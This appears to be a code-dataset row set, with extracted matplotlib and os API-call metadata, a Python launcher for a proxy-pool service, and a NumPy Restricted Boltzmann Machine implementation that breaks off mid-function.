| [
"matplotlib.pyplot.boxplot",
"text_analysis.utils.text_common.get_all_dirs_files",
"os.path.exists",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.close",
"os.mkdir",
"matplotlib.pyplot.yscale",
"json.loads",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.xticks",
"os.path.dirname",
"matplotli... | [((608, 637), 'text_analysis.utils.text_common.get_all_dirs_files', 'get_all_dirs_files', (['path_file'], {}), '(path_file)\n', (626, 637), False, 'from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files\n'), ((3009, 3040), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.2)'}), '(bottom=0.2)\n', (3028, 3040), True, 'import matplotlib.pyplot as plt\n'), ((4642, 4653), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4651, 4653), True, 'import matplotlib.pyplot as plt\n'), ((5193, 5220), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (5203, 5220), True, 'import matplotlib.pyplot as plt\n'), ((5236, 5276), 'matplotlib.pyplot.title', 'plt.title', (['"""boxplot-length"""'], {'fontsize': '(20)'}), "('boxplot-length', fontsize=20)\n", (5245, 5276), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5422), 'matplotlib.pyplot.boxplot', 'plt.boxplot', (['boxs'], {'notch': '(True)', 'sym': '"""*"""', 'vert': '(False)', 'showmeans': '(True)', 'patch_artist': '(True)'}), "(boxs, notch=True, sym='*', vert=False, showmeans=True,\n patch_artist=True)\n", (5344, 5422), True, 'import matplotlib.pyplot as plt\n'), ((5647, 5658), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5656, 5658), True, 'import matplotlib.pyplot as plt\n'), ((765, 776), 'text_analysis.utils.text_common.txt_read', 'txt_read', (['f'], {}), '(f)\n', (773, 776), False, 'from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files\n'), ((886, 901), 'json.loads', 'json.loads', (['tdd'], {}), '(tdd)\n', (896, 901), False, 'import json\n'), ((1181, 1206), 'collections.Counter', 'Counter', (['lengths_question'], {}), '(lengths_question)\n', (1188, 1206), False, 'from collections import Counter\n'), ((1230, 1250), 'collections.Counter', 'Counter', (['label_total'], {}), '(label_total)\n', (1237, 1250), False, 
'from collections import Counter\n'), ((2296, 2333), 'os.path.join', 'os.path.join', (['dir_save', '"""length.json"""'], {}), "(dir_save, 'length.json')\n", (2308, 2333), False, 'import os\n'), ((2391, 2427), 'os.path.join', 'os.path.join', (['dir_save', '"""length.png"""'], {}), "(dir_save, 'length.png')\n", (2403, 2427), False, 'import os\n'), ((2494, 2529), 'os.path.join', 'os.path.join', (['dir_save', '"""label.png"""'], {}), "(dir_save, 'label.png')\n", (2506, 2529), False, 'import os\n'), ((2955, 2975), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""symlog"""'], {}), "('symlog')\n", (2965, 2975), True, 'import matplotlib.pyplot as plt\n'), ((2984, 3004), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""symlog"""'], {}), "('symlog')\n", (2994, 3004), True, 'import matplotlib.pyplot as plt\n'), ((3658, 3717), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'ys'], {'size': '"""small"""', 'rotation': '(64)', 'fontsize': '(13)'}), "(xis, ys, size='small', rotation=64, fontsize=13)\n", (3668, 3717), True, 'import matplotlib.pyplot as plt\n'), ((3726, 3762), 'matplotlib.pyplot.plot', 'plt.plot', (['xis', 'xs', '"""o-"""'], {'label': 'u"""线条"""'}), "(xis, xs, 'o-', label=u'线条')\n", (3734, 3762), True, 'import matplotlib.pyplot as plt\n'), ((4546, 4563), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file'], {}), '(file)\n', (4557, 4563), True, 'import matplotlib.pyplot as plt\n'), ((4598, 4620), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""fig.png"""'], {}), "('fig.png')\n", (4609, 4620), True, 'import matplotlib.pyplot as plt\n'), ((5539, 5556), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file'], {}), '(file)\n', (5550, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5591, 5617), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""boxplot.png"""'], {}), "('boxplot.png')\n", (5602, 5617), True, 'import matplotlib.pyplot as plt\n'), ((3837, 3896), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'xs'], {'size': '"""small"""', 'rotation': '(64)', 
'fontsize': '(13)'}), "(xis, xs, size='small', rotation=64, fontsize=13)\n", (3847, 3896), True, 'import matplotlib.pyplot as plt\n'), ((3905, 3976), 'matplotlib.pyplot.pie', 'plt.pie', (['xs'], {'labels': 'ys', 'autopct': '"""%1.1f%%"""', 'shadow': '(False)', 'startangle': '(150)'}), "(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)\n", (3912, 3976), True, 'import matplotlib.pyplot as plt\n'), ((4208, 4267), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xis', 'ys'], {'size': '"""small"""', 'rotation': '(64)', 'fontsize': '(13)'}), "(xis, ys, size='small', rotation=64, fontsize=13)\n", (4218, 4267), True, 'import matplotlib.pyplot as plt\n'), ((4276, 4297), 'matplotlib.pyplot.bar', 'plt.bar', (['xis', 'xs', '(0.8)'], {}), '(xis, xs, 0.8)\n', (4283, 4297), True, 'import matplotlib.pyplot as plt\n'), ((5853, 5881), 'os.path.dirname', 'os.path.dirname', (['path_in_dir'], {}), '(path_in_dir)\n', (5868, 5881), False, 'import os\n'), ((5928, 5957), 'os.path.exists', 'os.path.exists', (['path_save_dir'], {}), '(path_save_dir)\n', (5942, 5957), False, 'import os\n'), ((5971, 5994), 'os.mkdir', 'os.mkdir', (['path_save_dir'], {}), '(path_save_dir)\n', (5979, 5994), False, 'import os\n')] |
#coding:utf-8
"""
@author : linkin
@email : <EMAIL>
@date : 2018-10-04
"""
import logging
from APIserver.apiserver import app
from components.collector import Collector
from components.validator import Validator
from components.detector import Detector
from components.scanner import Scaner
from components.tentacle import Tentacle
from multiprocessing import Pool
from multiprocessing import Manager
from config.config import MODE
from const.settings import RUN_FUNC
logger = logging.getLogger()
class Workstation(object):
"""
整个项目的启动工作面板
"""
def __init__(self):
self.collector = Collector()
self.validator = Validator()
self.detector = Detector()
self.scanner = Scaner()
self.tentacle = Tentacle()
self.proxyList = Manager().list()
def run_validator(self,proxyList):
self.validator.run(proxyList)
def run_collector(self,proxyList):
self.collector.run(proxyList)
def run_detector(self,*params):
self.detector.run()
def run_scanner(self,*params):
self.scanner.run()
def run_tentacle(self,*params):
self.tentacle.run()
def work(self):
"""
项目启动,根据config中的MODE配置执行对应的部件
这样可以隔离部件功能,耦合性较低。异步多进程执行需要
共享变量,使用了multiprocessing的Manager来生成
共享List.
"""
pool = Pool(5)
func = []
for i in MODE:
if MODE[i]:
func.append(eval('self.'+RUN_FUNC[i]))
[pool.apply_async(fun,args=(self.proxyList,)) for fun in func]
pool.close()
app.run(host='0.0.0.0',port=2020)
| [
"logging.getLogger",
"components.validator.Validator",
"components.tentacle.Tentacle",
"components.scanner.Scaner",
"APIserver.apiserver.app.run",
"multiprocessing.Pool",
"multiprocessing.Manager",
"components.collector.Collector",
"components.detector.Detector"
] | [((546, 565), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (563, 565), False, 'import logging\n'), ((675, 686), 'components.collector.Collector', 'Collector', ([], {}), '()\n', (684, 686), False, 'from components.collector import Collector\n'), ((712, 723), 'components.validator.Validator', 'Validator', ([], {}), '()\n', (721, 723), False, 'from components.validator import Validator\n'), ((749, 759), 'components.detector.Detector', 'Detector', ([], {}), '()\n', (757, 759), False, 'from components.detector import Detector\n'), ((785, 793), 'components.scanner.Scaner', 'Scaner', ([], {}), '()\n', (791, 793), False, 'from components.scanner import Scaner\n'), ((819, 829), 'components.tentacle.Tentacle', 'Tentacle', ([], {}), '()\n', (827, 829), False, 'from components.tentacle import Tentacle\n'), ((1412, 1419), 'multiprocessing.Pool', 'Pool', (['(5)'], {}), '(5)\n', (1416, 1419), False, 'from multiprocessing import Pool\n'), ((1640, 1674), 'APIserver.apiserver.app.run', 'app.run', ([], {'host': '"""0.0.0.0"""', 'port': '(2020)'}), "(host='0.0.0.0', port=2020)\n", (1647, 1674), False, 'from APIserver.apiserver import app\n'), ((855, 864), 'multiprocessing.Manager', 'Manager', ([], {}), '()\n', (862, 864), False, 'from multiprocessing import Manager\n')] |
import abc
import logging
from enum import Enum
from tqdm import tqdm
from ml import np
from ml.functions import sigmoid, dot_batch, bernoulli_from_probas
_log = logging.getLogger("ml")
class UnitType(Enum):
GAUSSIAN = 1
BERNOULLI = 2
class RBMSampler(object):
"""Sampler used in training of RBMs for estimating the gradient.
"""
def __init__(self, args):
super(RBMSampler, self).__init__()
self.args = args
class RBM:
"""
Restricted Boltzmann Machine with either Bernoulli or Gaussian
visible/hidden units.
Attributes
---------
num_visible: int
Number of visible units.
num_hidden: int
Number of hidden units.
visible_type: UnitType or str, default='bernoulli'
Type of random variable the visible units are assumed to be.
hidden_type: UnitType or str, default='bernoulli'
Type of random variable the hidden units are assumed to be.
estimate_visible_sigma: bool, default=False
Whether or not to estimate the variance of the visible units.
If :attr:`visible_type` is non-Gaussian, then this has no effect.
estimate_hidden_sigma: bool, default=False
Whether or not to estimate the variance of the hidden units.
If :attr:`hidden_type` is non-Gaussian, then this has no effect.
sampler_method: str, default='cd'
Specifies the method used in the sampling process when approximating
the gradient.
Available methods are:
- Contrastive Divergence (CD)
- Persistent Contrastive Divergence (PCD)
- Parallel Tempering (PT)
See :func:`RBM.grad` for more information about the
effects of the different available methods.
variables: list[array-like]
Holds the learnable parameters of the machine. This is used by
:func:`RBM.step` to deduce what parameters to update.
See Also
--------
:func:`RBM.grad` for more information about samplers.
"""
def __init__(self, num_visible, num_hidden,
visible_type='bernoulli', hidden_type='bernoulli',
estimate_visible_sigma=False, estimate_hidden_sigma=False,
sampler_method='cd'):
super(RBM, self).__init__()
self._warned_acceptance = 0
self.num_visible = num_visible
self.num_hidden = num_hidden
if sampler_method.lower() not in {'cd', 'pcd', 'pt'}:
raise ValueError(f"{sampler_method} is not supported")
self.sampler_method = sampler_method.lower()
# used by `PCD` sampler
self._prev = None
if isinstance(visible_type, str):
self.visible_type = getattr(UnitType, visible_type.upper())
else:
self.visible_type = visible_type
if isinstance(hidden_type, str):
self.hidden_type = getattr(UnitType, hidden_type.upper())
else:
self.hidden_type = hidden_type
self.estimate_visible_sigma = estimate_visible_sigma
self.estimate_hidden_sigma = estimate_hidden_sigma
self.v_bias, self.h_bias, self.v_sigma, self.h_sigma, self.W = self.initialize(
num_visible,
num_hidden
)
self._variables = [self.v_bias, self.h_bias, self.W]
if self.estimate_visible_sigma:
self._variables.append(self.v_sigma)
if self.estimate_hidden_sigma:
self._variables.append(self.h_sigma)
@property
def variables(self):
return self._variables
@staticmethod
def initialize(num_visible, num_hidden):
# biases for visible and hidden, respectively
v_bias = np.zeros(num_visible)
h_bias = np.zeros(num_hidden)
# weight matrix
W = np.random.normal(0.0, 0.01, (num_visible, num_hidden))
# variances
v_sigma = np.ones(num_visible)
h_sigma = np.ones(num_hidden)
return v_bias, h_bias, v_sigma, h_sigma, W
def energy(self, v, h):
if self.visible_type == UnitType.BERNOULLI:
visible = np.matmul(v, self.v_bias)
elif self.visible_type == UnitType.GAUSSIAN:
visible = ((v - self.v_bias) ** 2) / (self.v_sigma ** 2
+ np.finfo(np.float32).eps)
visible = 0.5 * np.sum(visible, axis=1)
# term only dependent on hidden
if self.hidden_type == UnitType.BERNOULLI:
hidden = np.matmul(h, self.h_bias)
elif self.hidden_type == UnitType.GAUSSIAN:
hidden = ((h - self.h_bias) ** 2) / (self.h_sigma ** 2
+ np.finfo(np.float32).eps)
hidden = 0.5 * np.sum(hidden, axis=1)
# "covariance" term
# v^T W = sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = np.matmul(v, self.W)
# v^T W h = sum_{\mu} h_{\mu} sum_j( (v_j / sigma_j) W_{j \mu} )
covariance = dot_batch(h, covariance)
return - (visible + hidden + covariance)
def mean_visible(self, h, beta=1.0):
    r"""Conditional expectation :math:`\mathbb{E}[\mathbf{v} \mid \mathbf{h}]`.

    For Bernoulli visible units this equals the conditional probability

    .. math::
        p(V_i = 1 \mid \mathbf{h}) = \text{sigmoid}\Big(\beta \big(b_i
        + \sum_{\mu} W_{i\mu} h_\mu / \sigma_\mu\big)\Big)

    while for Gaussian visible units it is the affine mean
    :math:`b_i + \sigma_i \sum_{\mu} W_{i\mu} h_\mu / \sigma_\mu`
    (:math:`\sigma_\mu = 1` for Bernoulli hidden units).

    Notes
    -----
    The Gaussian expectation is independent of :math:`\beta`; the
    temperature only shows up in the variance (see
    :func:`RBM.proba_visible`).
    """
    activation = self.v_bias + self.v_sigma * np.matmul(h / self.h_sigma, self.W.T)
    if self.visible_type == UnitType.BERNOULLI:
        return sigmoid(beta * activation)
    elif self.visible_type == UnitType.GAUSSIAN:
        return activation
def mean_hidden(self, v, beta=1.0):
    """Conditional expectation E[h | v].

    Sigmoid of the (beta-scaled) pre-activation for Bernoulli hidden
    units; the raw affine pre-activation for Gaussian hidden units.
    """
    activation = self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)
    if self.hidden_type == UnitType.BERNOULLI:
        return sigmoid(beta * activation)
    elif self.hidden_type == UnitType.GAUSSIAN:
        return activation
def sample_visible(self, h, beta=1.0):
    """Draw a visible configuration conditioned on the hidden state ``h``."""
    mean = self.mean_visible(h, beta=beta)
    if self.visible_type == UnitType.BERNOULLI:
        # for Bernoulli units the conditional mean IS the probability
        return bernoulli_from_probas(mean)
    if self.visible_type == UnitType.GAUSSIAN:
        # NOTE(review): `scale` receives v_sigma**2 / beta, i.e. a
        # variance where np.random.normal expects a standard deviation
        # -- confirm this is intentional before changing it.
        return np.random.normal(loc=mean,
                                scale=self.v_sigma ** 2 / beta,
                                size=mean.shape)
    raise ValueError(f"unknown type {self.visible_type}")
def sample_hidden(self, v, beta=1.0):
    """Draw a hidden configuration conditioned on the visible state ``v``.

    Parameters
    ----------
    v: array-like
        Batch of visible configurations.
    beta: float
        Inverse temperature forwarded to :func:`RBM.mean_hidden`.
    """
    mean = self.mean_hidden(v, beta=beta)
    # branch on the HIDDEN unit type; this previously checked
    # `self.visible_type`, which mis-sampled models whose visible and
    # hidden unit types differ (cf. `mean_hidden` / `proba_hidden`).
    if self.hidden_type == UnitType.BERNOULLI:
        # E[h | v] = p(h | v) for Bernoulli
        h = bernoulli_from_probas(mean)
    elif self.hidden_type == UnitType.GAUSSIAN:
        h = np.random.normal(loc=mean,
                             scale=(self.h_sigma ** 2 / beta),
                             size=(mean.shape))
    else:
        raise ValueError(f"unknown type {self.hidden_type}")
    return h
def proba_visible(self, h, v=None, beta=1.0):
    """Probability of the visible state given the hidden state ``h``.

    For Bernoulli visible units this is the conditional mean itself,
    i.e. p(V_i = 1 | h). For Gaussian visible units the normal density
    of ``v`` under N(mean, v_sigma) is evaluated, so ``v`` must be given.
    """
    mean = self.mean_visible(h, beta=beta)
    if self.visible_type == UnitType.BERNOULLI:
        # E[v | h] = p(v | h) for Bernoulli
        p = mean
    elif self.visible_type == UnitType.GAUSSIAN:
        z = np.clip((v - mean) ** 2 / (2.0 * self.v_sigma ** 2),
                    -30.0, 30.0)
        z *= beta
        # Gaussian density decays away from the mean: exp(-z).
        # (Previously exp(+z) was used, which GROWS with |v - mean|.)
        p = (np.exp(-z) / (np.sqrt(2 * np.pi) * self.v_sigma
                           + np.finfo(np.float32).eps))
    else:
        raise ValueError(f"unknown type {self.visible_type}")
    return p
def sample(self, v, beta=1.0):
    """One full Gibbs transition: v -> h ~ p(h|v) -> v' ~ p(v'|h)."""
    hidden = self.sample_hidden(v, beta=beta)
    return self.sample_visible(hidden, beta=beta)
def proba_hidden(self, v, h=None, beta=1.0):
    """Probability of the hidden state given the visible state ``v``.

    For Bernoulli hidden units this is the conditional mean itself,
    i.e. p(H_mu = 1 | v). For Gaussian hidden units the normal density
    of ``h`` under N(mean, h_sigma) is evaluated, so ``h`` must be given.
    """
    mean = self.mean_hidden(v, beta=beta)
    if self.hidden_type == UnitType.BERNOULLI:
        # E[h | v] = p(h | v) for Bernoulli
        p = mean
    elif self.hidden_type == UnitType.GAUSSIAN:
        z = np.clip((h - mean) ** 2 / (2.0 * self.h_sigma ** 2),
                    -30.0, 30.0)
        z *= beta
        # Gaussian density decays away from the mean: exp(-z).
        # (Previously exp(+z) was used, which GROWS with |h - mean|.)
        p = (np.exp(-z) / (np.sqrt(2 * np.pi) * self.h_sigma
                           + np.finfo(np.float32).eps))
    else:
        raise ValueError(f"unknown type {self.hidden_type}")
    return p
def free_energy(self, v, beta=1.0, raw=False):
    """Free energy F(v) of a batch of visible states (hidden layer summed out).

    Parameters
    ----------
    v: array-like
        Batch of visible configurations.
    beta: float
        Inverse temperature scaling.
    raw: bool
        If True, return per-sample values instead of the batch mean.
    """
    # hidden-unit contribution with the hidden layer analytically summed out
    if self.hidden_type == UnitType.BERNOULLI:
        hidden = self.h_bias + np.matmul((v / self.v_sigma), self.W)
        hidden *= beta
        # softplus of the pre-activation, clipped for numerical stability
        hidden = - np.sum(np.log(1.0 + np.exp(np.clip(hidden, -30, 30))),
                          axis=1)
    elif self.hidden_type == UnitType.GAUSSIAN:
        # TODO: Implement
        # Have the formulas, but gotta make sure yo!
        hidden = np.sum(
            1 / (2 * self.h_sigma) * (
                self.h_bias ** 2
                - (self.h_bias + self.h_sigma * np.matmul(v / self.v_sigma, self.W)) ** 2
            ),
            axis=1
        )
        # log normalization constant of the Gaussian hidden units
        hidden -= 0.5 * self.num_hidden * np.log(2 * np.pi) + np.sum(np.log(self.h_sigma))
        # raise NotImplementedError()
    # visible-unit contribution
    if self.visible_type == UnitType.BERNOULLI:
        visible = - np.matmul(v, self.v_bias)
        visible *= beta
    elif self.visible_type == UnitType.GAUSSIAN:
        visible = 0.5 * np.sum(
            ((v - self.v_bias) ** 2)
            / (self.v_sigma ** 2 / beta + np.finfo(np.float32).eps),
            axis=1
        )
    else:
        raise ValueError(f"unknown type {self.visible_type}")
    # sum across batch to obtain log of joint-likelihood
    if raw:
        return hidden + visible
    else:
        return np.mean(hidden + visible)
def contrastive_divergence(self, v_0,
                           k=1,
                           h_0=None,
                           burnin=-1,
                           beta=1.0):
    """Contrastive Divergence (CD-k) via blocked Gibbs sampling.

    Parameters
    ----------
    v_0: array-like
        Visible state used to initialize the chain.
    k: int
        Number of Gibbs steps (the "k" in CD-k).
    h_0: array-like, optional
        Initial hidden state; sampled conditioned on ``v_0`` if omitted.
    burnin: int
        Unused here; accepted for interface compatibility with callers.
    beta: float
        Inverse temperature forwarded to the conditional samplers.

    Returns
    -------
    (v_0, h_0, v_k, h_k): tuple
        Initial and final states of the visible and hidden units.
    """
    if h_0 is None:
        h_0 = self.sample_hidden(v_0, beta=beta)
    v_k, h_k = v_0, h_0
    for _ in range(k):
        v_k = self.sample_visible(h_k, beta=beta)
        h_k = self.sample_hidden(v_k, beta=beta)
    return v_0, h_0, v_k, h_k
def reset_sampler(self):
    """Drop persisted chain state; only meaningful for the PCD sampler."""
    if self.sampler_method != 'pcd':
        return
    self._prev = None
def _init_parallel_tempering(self, v, betas=None, num_temps=10, **kwargs):
# 1. Initialize list of samples
if betas is None:
n = num_temps
else:
n = len(betas)
return np.tile(v, (n, 1, 1))
def parallel_tempering(self, vs, hs=None,
                       k=1,
                       betas=None,
                       max_temp=100, num_temps=10,
                       include_negative_shift=False):
    """One round of parallel tempering (replica exchange) Gibbs sampling.

    Runs CD-k independently at each inverse temperature in ``betas``
    (defaulting to 1 / linspace(1, max_temp, num_temps)), then proposes
    Metropolis swaps between neighbouring temperatures from hottest to
    coldest. Returns the per-temperature visible/hidden states; when
    ``include_negative_shift`` is set, the (swapped) initial states are
    returned as well.
    """
    # TODO: Performing sampling in parallel, rather than using a loop
    # 1. Allow `self.contrastive_divergence` to take on arrays of betas
    # 2. Stack betas and initial samples
    # 3. Perform sampling
    # 4. Unstack
    batch_size = vs[0].shape[0]
    # 1. Initialize list of samples
    if betas is None:
        betas = np.linspace(1, max_temp, num_temps) ** (-1)
    R = len(betas)
    res = []
    if include_negative_shift:
        neg_res = []
    # 2. Perform gibbs sampling for tempered distributions
    for r in range(R):
        v = vs[r]
        if hs is not None:
            h = hs[r]
        else:
            h = None
        v_0, h_0, v_k, h_k = self.contrastive_divergence(
            v,
            k=k,
            beta=betas[r],
            h_0=h
        )
        res.append((v_k, h_k))
        if include_negative_shift:
            neg_res.append((v_0, h_0))
    # 3. Simulated Annealing to perform swaps ("exchange particles")
    for r in range(R - 1, 0, -1):
        # per-sample Metropolis acceptance ratio for swapping chains r and r-1
        a = np.exp((betas[r] - betas[r - 1]) *
                   (self.energy(*res[r]) - self.energy(*res[r - 1])))
        u = np.random.random(batch_size)
        # acceptance mask
        acc_mask = (u < a).reshape(batch_size, 1)
        # reject mask
        rej_mask = ~acc_mask
        v = res[r][0] * acc_mask + res[r - 1][0] * rej_mask
        h = res[r][1] * acc_mask + res[r - 1][1] * rej_mask
        res[r - 1] = v, h
        # TODO: this is useless, right? We're not ever using `res[r]` again
        # in this iteration
        # NOTE(review): `res[r - 1]` was already overwritten above, so this
        # reads the UPDATED state -- confirm intended before relying on res[r]
        v = res[r - 1][0] * acc_mask + res[r][0] * rej_mask
        h = res[r - 1][1] * acc_mask + res[r][1] * rej_mask
        res[r] = v, h
        # warn user if very small/large number of samples rejected/accepted
        # but don't if the `batch_size` is super small..
        if r == 1 and batch_size > 2 and self._warned_acceptance < 10:
            num_acc = acc_mask[acc_mask].shape[0]
            if num_acc >= 0.9 * batch_size:
                _log.warn(f"Large portion of tempered samples accepted ({num_acc} / {batch_size})")
                self._warned_acceptance += 1
            elif num_acc <= 0.1 * batch_size:
                _log.warn(f"Small portion of tempered samples accepted ({num_acc} / {batch_size})")
                self._warned_acceptance += 1
    # possibly perform same for the negative shift
    if include_negative_shift:
        for r in range(R - 1, 0, -1):
            a = np.exp((betas[r] - betas[r - 1]) *
                       (self.energy(*neg_res[r]) - self.energy(*neg_res[r - 1])))
            u = np.random.random(batch_size)
            # acceptance mask
            acc_mask = (u < a).reshape(batch_size, 1)
            # reject mask
            rej_mask = ~acc_mask
            v = neg_res[r][0] * acc_mask + neg_res[r - 1][0] * rej_mask
            h = neg_res[r][1] * acc_mask + neg_res[r - 1][1] * rej_mask
            neg_res[r - 1] = v, h
            v = neg_res[r - 1][0] * acc_mask + neg_res[r][0] * rej_mask
            h = neg_res[r - 1][1] * acc_mask + neg_res[r][1] * rej_mask
            neg_res[r] = v, h
    res_v = [r[0] for r in res]
    res_h = [r[1] for r in res]
    # return final state
    if include_negative_shift:
        neg_res_v = [r[0] for r in neg_res]
        neg_res_h = [r[1] for r in neg_res]
        return neg_res_v, neg_res_h, res_v, res_h
    else:
        return res_v, res_h
def _update(self, grad, lr=0.1):
# in case using `cupy`, can't use `np.shape`
# to obtain "shape" of single element; this is a fix
lr = np.asarray(lr)
gamma = lr
for i in range(len(self.variables)):
if lr.shape:
gamma = lr[i]
self.variables[i] -= gamma * grad[i]
def _apply_weight_decay(self, lmbda=0.01):
for i in range(len(self.variables)):
# default is gradient DEscent, so weight-decay also switches signs
self.variables[i] += lmbda * self.variables[i]
def step(self, v, k=1, lr=0.1, lmbda=0.0, **sampler_kwargs):
    """Perform a single gradient DEscent step on the batch ``v``.

    Parameters
    ----------
    v: array-like
        Mini-batch of visible configurations.
    k: int
        Number of sampling steps, forwarded to :func:`RBM.grad`.
    lr: float or array
        Learning rate(s) passed on to :func:`RBM._update`.
    lmbda: float
        Weight-decay coefficient; decay is skipped entirely when 0.
    """
    batch_grad = self.grad(v, k=k, **sampler_kwargs)
    self._update(batch_grad, lr=lr)
    if lmbda > 0.0:
        self._apply_weight_decay(lmbda=lmbda)
def reconstruct(self, v, num_samples=100):
    """Monte-Carlo reconstruction of ``v``.

    Averages ``num_samples`` independent draws of
    v' ~ p(v' | h), h ~ p(h | v).
    """
    total = self.sample_visible(self.sample_hidden(v))
    for _ in range(num_samples - 1):
        total = total + self.sample_visible(self.sample_hidden(v))
    return total / num_samples
def grad(self, v, burnin=-1, persist=False, **sampler_kwargs):
    """Estimate the gradient of the negative log-likelihood on batch ``v``.

    The negative phase is produced by the sampler selected at
    construction time (``self.sampler_method``): plain Contrastive
    Divergence ('cd'), Persistent CD ('pcd'), or Parallel Tempering ('pt').

    Parameters
    ----------
    v: array-like
        Batch of visible configurations.
    burnin: int
        If > 0 and using PCD with no persisted chain yet, run this many
        Gibbs steps to initialize the chain.
    persist: bool
        If True (PT only), keep the final chain state for the next call.

    Returns
    -------
    grads: list of arrays
        Gradients ordered like ``self.variables``:
        [delta_v_bias, delta_h_bias, delta_W, (delta_v_sigma)].
    """
    if self.sampler_method.lower() == 'cd':
        v_0, h_0, v_k, h_k = self.contrastive_divergence(
            v,
            **sampler_kwargs
        )
    elif self.sampler_method.lower() == 'pcd':
        # Persistent Contrastive Divergence
        if self._prev is not None:
            v_0, h_0 = self._prev
        else:
            # ``burnin`` specified, we perform this to initialize the chain
            if burnin > 0:
                _log.info(f"Performing burnin of {burnin} steps to initialize PCD")
                # unpack in `contrastive_divergence`'s return order
                # (v_0, h_0, v_k, h_k): the FINAL state seeds the chain.
                # (Previously the visible/hidden states were swapped here.)
                _, _, v_0, h_0 = self.contrastive_divergence(v, k=burnin, **sampler_kwargs)
            else:
                h_0 = self.sample_hidden(v, **sampler_kwargs)
                v_0 = v
        v_0, h_0, v_k, h_k = self.contrastive_divergence(
            v,
            h_0=h_0,
            **sampler_kwargs
        )
        # persist the chain state for the next gradient step
        self._prev = (v_k, h_k)
    elif self.sampler_method.lower() == 'pt':
        h_0 = None
        if self._prev is not None:
            v_0, h_0 = self._prev
        else:
            _log.info("Initializing PT chain...")
            v_0 = self._init_parallel_tempering(v, **sampler_kwargs)
        # FIXME: make compatible with `parallel_tempering` returning
        # all the states
        if h_0 is None:
            v_0, h_0, v_k, h_k = self.parallel_tempering(
                v_0,
                hs=h_0,
                include_negative_shift=True,
                **sampler_kwargs
            )
        elif sampler_kwargs.get("include_negative_shift", False):
            v_0, h_0, v_k, h_k = self.parallel_tempering(
                v_0,
                hs=h_0,
                **sampler_kwargs
            )
        else:
            # FIXME: make compatible with `parallel_tempering` returning
            # all the states
            v_k, h_k = self.parallel_tempering(
                v_0,
                hs=h_0,
                **sampler_kwargs
            )
        if persist:
            self._prev = (v_k, h_k)
        # take the first tempered distribution, i.e. the one corresponding
        # the target distribution
        v_0 = v_0[0]
        h_0 = h_0[0]
        v_k = v_k[0]
        # previously `h_k = v_k[0]`, which overwrote the hidden state
        # with a slice of the (already-unstacked) visible state
        h_k = h_k[0]
    else:
        raise ValueError(f"{self.sampler_method} is not supported")
    # all expressions below using `v` or `mean_h` will contain
    # AT LEAST one factor of `1 / v_sigma` and `1 / h_sigma`, respectively
    # so we include those right away
    v_0 = v_0 / self.v_sigma
    v_k = v_k / self.v_sigma
    mean_h_0 = self.mean_hidden(v_0) / self.h_sigma
    mean_h_k = self.mean_hidden(v_k) / self.h_sigma
    # Recall: `v_sigma` and `h_sigma` have no effect if they are set to 1
    # v_0 / (v_sigma^2) - v_k / (v_sigma^2)
    delta_v_bias = (v_0 - v_k) / self.v_sigma
    # E[h_0 | v_0] / (h_sigma^2) - E[h_k | v_k] / (h_sigma^2)
    delta_h_bias = (mean_h_0 - mean_h_k) / self.h_sigma
    # Gradient wrt. W: batched outer products
    # (v_0 / v_sigma) (1 / h_sigma) E[h_0 | v_0] - (v_k / v_sigma) (1 / h_sigma) E[h_k | v_k]
    x = mean_h_0.reshape(mean_h_0.shape[0], 1, mean_h_0.shape[1])
    y = v_0.reshape(v_0.shape[0], v_0.shape[1], 1)
    z_0 = np.matmul(y, x)
    x = mean_h_k.reshape(mean_h_k.shape[0], 1, mean_h_k.shape[1])
    y = v_k.reshape(v_k.shape[0], v_k.shape[1], 1)
    z_k = np.matmul(y, x)
    delta_W = z_0 - z_k
    # average over batch and take the negative (gradient DEscent)
    delta_v_bias = - np.mean(delta_v_bias, axis=0)
    delta_h_bias = - np.mean(delta_h_bias, axis=0)
    delta_W = - np.mean(delta_W, axis=0)
    grads = [delta_v_bias, delta_h_bias, delta_W]
    # variances
    if self.visible_type == UnitType.GAUSSIAN \
            and self.estimate_visible_sigma:
        # in `GaussianRBM`, where only VISIBLE units Gaussian,
        # we only compute `v_sigma`
        # (((v_0 - b)^2 / (v_sigma^2)) - (v / (v_sigma)) \sum_{\mu} E[h_{\mu} | v] / sigma_{\mu}) / v_sigma
        delta_v_sigma_data = (((v_0 - (self.v_bias / self.v_sigma)) ** 2)
                              - v_0 * (np.matmul(mean_h_0, self.W.T)))
        delta_v_sigma_model = (((v_k - (self.v_bias / self.v_sigma)) ** 2)
                               - v_k * (np.matmul(mean_h_k, self.W.T)))
        delta_v_sigma = (delta_v_sigma_data - delta_v_sigma_model) / self.v_sigma
        # average over batch take the negative
        delta_v_sigma = - np.mean(delta_v_sigma, axis=0)
        grads.append(delta_v_sigma)
    if self.hidden_type == UnitType.GAUSSIAN \
            and self.estimate_hidden_sigma:
        # TODO: Implement
        raise NotImplementedError("gradients for gaussian hidden"
                                  " units not yet implemented")
        # NOTE: unreachable draft kept below for reference
        delta_h_sigma_data = (((h_0 - (self.h_bias / self.h_sigma)) ** 2)
                              - h_0 * (np.matmul(mean_h_0, self.W.T)))
        delta_h_sigma_model = (((h_k - (self.h_bias / self.h_sigma)) ** 2)
